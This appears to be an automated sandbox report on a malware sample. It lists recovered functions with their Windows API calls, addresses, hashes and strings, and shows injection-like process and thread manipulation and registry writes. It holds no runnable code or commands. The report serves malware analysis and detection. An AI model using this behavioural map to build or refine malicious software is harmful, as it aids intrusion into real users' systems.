    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C439B, Relevance: 7.6, APIs: 5, Instructions: 98 Total matches: 56timememory
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9F0B, Relevance: 7.6, APIs: 5, Instructions: 95 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C44E2, Relevance: 7.6, APIs: 5, Instructions: 90 Total matches: 117synchronization
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAD95, Relevance: 7.6, APIs: 5, Instructions: 85 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C59D7, Relevance: 7.6, APIs: 5, Instructions: 83 Total matches: 27memorytime
Similarity
  • Total matches: 27
  • API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2335115045-0
  • Opcode ID: 87b7f9457d6eb4fb8a765cd00379997a4ae998d37287d2c68f8de9ad653ea43e
  • Instruction ID: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
  • Opcode Fuzzy Hash: 73F08BB11645925BD10230500D063B7F90AFBB13EAC4DFE12DD20342AB3F8321266BAC
  • Instruction Fuzzy Hash: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5A01
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5A14
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5A25
  • RtlAllocateHeap.NTDLL(00000000,001EB264,?), ref: 001C5A90
  • InterlockedIncrement.KERNEL32(001EB25C), ref: 001C5AA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC4E7, Relevance: 7.6, APIs: 5, Instructions: 81 Total matches: 95
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6D18, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C848E, Relevance: 7.6, APIs: 5, Instructions: 67 Total matches: 56memorysynchronization
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C11B3, Relevance: 7.6, APIs: 5, Instructions: 65 Total matches: 61filememory
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7B90, Relevance: 7.6, APIs: 5, Instructions: 62 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5B7B, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 25memory
Similarity
  • Total matches: 25
  • API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy
  • String ID:
  • API String ID: 229461383-0
  • Opcode ID: bbc3c6a859906d8649009038d034178e5739454c1ef541e28150f978055748ba
  • Instruction ID: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
  • Opcode Fuzzy Hash: EDE06870284402D5901B6489BC4AA32FA0BFA813CADCD411BDD613924D3AC305A57B18
  • Instruction Fuzzy Hash: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
  • memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001CAE7F: lstrcmpi.KERNEL32(?,001EC4EA), ref: 001CAED6
    • Part of subcall function 001CAE7F: HeapFree.KERNEL32(00000000,00000000,001C5C01), ref: 001CAF03
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA73F, Relevance: 7.6, APIs: 5, Instructions: 55 Total matches: 50memoryregistry
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D81E6, Relevance: 7.5, APIs: 5, Instructions: 35 Total matches: 108
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1473, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61 Total matches: 61memory
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D74F7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57 Total matches: 53
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA6B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3ACC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
